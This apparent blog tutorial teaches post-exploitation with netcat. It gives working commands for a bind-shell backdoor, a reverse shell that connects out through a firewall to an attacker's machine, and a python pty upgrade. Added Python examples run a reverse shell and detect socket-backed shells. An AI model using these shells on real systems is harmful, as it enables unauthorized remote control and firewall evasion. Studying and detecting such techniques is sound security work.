Wednesday, August 22, 2012

Reverse terminals

After compromising a target machine it's time for some post exploitation using a backdoor.

This can be done easily with netcat, our Swiss-army knife for TCP/IP.
 
Netcat is a feature-rich networking utility which reads and writes data across network connections over TCP or UDP.
There's also an enhanced version that encrypts the connection with Twofish, called cryptcat. For this exercise we are using the plain, older netcat.

Compromised machine: 10.0.1.50
Attacker's machine: 10.0.1.100

First of all, we need to download and build a netcat version that supports the -e option on our compromised target machine (GNU netcat 0.7.1 here); the netcat shipped with many distributions, in particular the OpenBSD flavour, has -e left out on purpose. Make sure to also install a compiler toolchain like gcc.

apt-get install libc6-dev g++ gcc
wget http://downloads.sourceforge.net/project/netcat/netcat/0.7.1/netcat-0.7.1.tar.bz2
tar -xjvf netcat-0.7.1.tar.bz2
cd netcat-0.7.1
./configure
make
make install


After netcat has been compiled and installed (the binary ends up in the build tree and, after make install, in the path) we can use the following command on our target machine to create a backdoor listener:

./netcat -l -p 6666 -e /bin/bash

This listens on TCP port 6666 and, as soon as a client connects, starts /bin/bash with the socket as its stdin, stdout and stderr: a bind shell.



It's now possible for an attacker to connect from a remote machine to our compromised target, using netcat as a client this time.

netcat 10.0.1.50 6666

We are getting a command shell:



Our post exploitation tool is working!

When the compromised machine is behind a firewall this can be a problem.
A bind shell needs an inbound connection to port 6666, and a firewall is actually blocking inbound ports... remember? :-)

Another possibility is using a reverse shell with netcat.
In a reverse shell, the connection is initiated by the compromised machine: it connects back to the attacker's machine. Since firewalls and NAT gateways usually allow outbound traffic far more liberally than inbound, we can use this technique to circumvent them. Use a standard port that you think will be allowed outbound through the firewall: ports 443, 80 and 53 are often good options, because they look like HTTPS, HTTP and DNS traffic.

The following command starts a listener on port TCP 443 of the attacker's machine (run it as root, since 443 is a privileged port; the OpenBSD flavour of nc takes the port number without -p):

nc -l -p 443



On our target machine we use netcat with the following syntax:

./netcat 10.0.1.100 443 -e /bin/bash



This connects out to the attacker on TCP port 443 and attaches /bin/bash to that connection, a shell the reverse way around. From the target's point of view it's an outbound connection, which is exactly what the firewall lets through.



Cool! We circumvented the firewall.
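To make explicit what the -e option does on the target and what the listener does on the attacker's side, here is the exchange above as an added example in Python (not code from the original post, and not netcat's own code). It runs the whole thing on loopback: the listener, the connect-back shell whose stdin/stdout/stderr are the socket, a command typed into it, and, as the defender's counterpart, a scan of /proc for shells that have sockets on fd 0 and 1, which is the fingerprint every -e style shell leaves behind. /bin/sh instead of /bin/bash and 127.0.0.1 instead of the 10.0.1.x addresses are assumptions so the example runs anywhere; the bind-shell variant earlier in the post is the same mechanism with the listening side swapped.

```python
"""Added example, not from the original post: a reverse shell on loopback
and the host-side check that spots it.  Assumes Linux (/proc) and /bin/sh."""
import os
import socket
import subprocess

# comm values a shell process typically carries in /proc/PID/comm
SHELL_NAMES = {"sh", "bash", "dash", "ash", "zsh", "busybox"}


def start_listener(host="127.0.0.1", port=0):
    """Attacker side, like `nc -l -p PORT`.  Port 0 lets the kernel pick a
    free port; the caller reads it back with getsockname()."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    return srv


def reverse_shell(host, port, shell="/bin/sh"):
    """Victim side, like `netcat HOST PORT -e SHELL`: connect out, then start
    the shell with the socket duplicated onto fd 0, 1 and 2 (Popen does the
    dup2() calls in the child).  No pty is involved, which is why `top`
    does not work in such a shell."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, port))
    proc = subprocess.Popen([shell], stdin=sock.fileno(),
                            stdout=sock.fileno(), stderr=sock.fileno())
    sock.close()            # the child owns its own copies of the descriptor
    return proc


def run_command(conn, cmd, marker="__END_OF_OUTPUT__", timeout=5.0):
    """Attacker side: type a command into the shell and collect its output.
    A marker is echoed after the command because a raw shell prints no
    prompt, so there is no other signal that the output is complete."""
    conn.settimeout(timeout)
    conn.sendall(f"{cmd}; echo {marker}\n".encode())
    buf = b""
    while marker.encode() not in buf:
        chunk = conn.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf.split(marker.encode())[0].decode(errors="replace").strip()


def find_socket_backed_shells(proc_root="/proc"):
    """Defender side: (pid, comm) of shell processes whose fd 0 and fd 1 both
    point at sockets.  Only processes the caller may inspect are seen, so run
    it as root on a real hunt."""
    hits = []
    if not os.path.isdir(proc_root):
        return hits
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            with open(f"{proc_root}/{pid}/comm") as f:
                comm = f.read().strip()
            fd0 = os.readlink(f"{proc_root}/{pid}/fd/0")
            fd1 = os.readlink(f"{proc_root}/{pid}/fd/1")
        except OSError:
            continue        # process exited, or not ours to inspect
        if comm in SHELL_NAMES and fd0.startswith("socket:") and fd1.startswith("socket:"):
            hits.append((pid, comm))
    return hits


def demo():
    """Whole exchange on loopback: listen, connect back, run a command, then
    look for the shell from the host side.  Returns (output, detected, has_procfs)."""
    srv = start_listener()
    host, port = srv.getsockname()
    victim = reverse_shell(host, port)
    conn, _ = srv.accept()
    try:
        output = run_command(conn, "echo pwned-$((6*7))")   # arithmetic is a shell builtin
        has_procfs = os.path.isdir("/proc")
        detected = any(pid == victim.pid for pid, _ in find_socket_backed_shells())
    finally:
        conn.close()
        srv.close()
        victim.wait()       # the shell exits on EOF once the socket is gone
    return output, detected, has_procfs


if __name__ == "__main__":
    print(demo())
</code></code>```

The detection half is the part worth keeping around: a legitimate interactive shell has a tty on fd 0 and 1, a shell reading a script has a file or a pipe, but a shell with a socket on both is almost always netcat -e, a socat exec, or the python/perl one-liners that do the same dup2() trick, whether the connection was bound or reversed.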

Another issue is that this shell is not attached to a real terminal. There's a big difference between a shell reading from a socket and a shell running in a terminal (a TTY): there is no line discipline, no window size, no job control and no TERM setting, so interactive programs that need a terminal don't work.

Try 'top'...
Not working...



And here comes another piece of magic when we enter the following command in our shell (it needs Python on the target, which is a safe bet on most Linux systems):

python -c 'import pty;pty.spawn("/bin/bash")'

Python allocates a pseudo-terminal, runs bash inside it and copies data between the pty and our socket. Our shell became a real terminal, a reverse terminal:

 
 
Our 'top' command is working:



Awesome, and easy.
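To see why the pty trick works, here is an added example (not code from the original post) that runs the same /bin/sh once with plain pipes on its stdio, as a raw netcat -e shell has, and once forked under a pseudo-terminal the way pty.spawn() does it. Instead of top, it uses the POSIX builtin test [ -t 0 ], which simply asks the shell whether its stdin is a terminal; /bin/sh is assumed to exist.

```python
"""Added example, not from the original post: shell over pipes versus shell
over a pseudo-terminal, made visible with `[ -t 0 ]`.  Assumes /bin/sh."""
import os
import pty
import subprocess

# the shell reports whether fd 0 is a terminal; `top`, `vi` and sudo's password
# prompt make the same decision internally
CHECK = '[ -t 0 ] && echo terminal || echo "not a tty"'


def shell_over_pipes(shell="/bin/sh"):
    """Shell with plain pipes on fd 0/1/2, like a raw netcat -e shell.
    Returns what the shell says about its stdin."""
    result = subprocess.run([shell, "-c", CHECK], capture_output=True, text=True)
    return result.stdout.strip()


def shell_over_pty(shell="/bin/sh"):
    """Same shell, but forked under a pseudo-terminal as pty.spawn() does it:
    the child gets the pty slave as controlling terminal and stdio, we read
    its output from the master side (in a reverse terminal the master is
    what gets copied to and from the socket)."""
    pid, master_fd = pty.fork()
    if pid == 0:                                  # child: become the shell
        os.execv(shell, [shell, "-c", CHECK])
    chunks = []
    while True:
        try:
            data = os.read(master_fd, 1024)
        except OSError:                           # Linux raises EIO once the slave closes
            break
        if not data:
            break
        chunks.append(data)
    os.close(master_fd)
    os.waitpid(pid, 0)
    return b"".join(chunks).decode(errors="replace").strip()


if __name__ == "__main__":
    print("pipes:", shell_over_pipes())           # not a tty
    print("pty:  ", shell_over_pty())             # terminal
```

One caveat for a real session: the attacker's nc is still a plain program reading your keyboard line by line, so a Ctrl-C goes to nc and kills the connection rather than the remote command. The usual fix after pty.spawn is to background nc with Ctrl-Z, run stty raw -echo in the local terminal, bring nc back with fg, and then run reset and export TERM=xterm in the remote shell, after which keystrokes, signals and screen-oriented programs behave as in a normal terminal.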

In this post we used netcat as a post exploitation tool spawning a reverse terminal.